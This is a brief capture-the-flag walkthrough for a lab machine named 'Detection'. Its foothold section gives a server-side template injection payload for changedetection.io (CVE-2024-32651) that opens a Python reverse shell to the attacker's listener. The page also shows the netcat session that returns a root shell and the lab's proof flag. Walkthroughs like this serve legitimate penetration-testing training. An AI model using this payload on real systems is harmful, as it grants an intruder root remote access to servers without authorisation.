> For the complete documentation index, see [llms.txt](https://walkthroughs.cyanidesecurity.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://walkthroughs.cyanidesecurity.com/proving-grounds/detection.md).

# Detection

## Intro

## Initial Foothold

<figure><img src="/files/so0dzFvBCkUe4CjBpAhp" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VXXmsDcXHfR7SRywcs37" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lpGxcTb2n2YBfNeRBkHF" alt=""><figcaption></figcaption></figure>

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"192.168.45.196\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
```

{% embed url="<https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/>" %}

```
┌──(venv)─(root㉿kali)-[/home/joe/hax/pg/detection]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.199.97] 52556
root@detection:/# cat /root/proof.txt
cat /root/proof.txt
4b23104610703656c41480e23a67c656
```

## Privilege Escalation
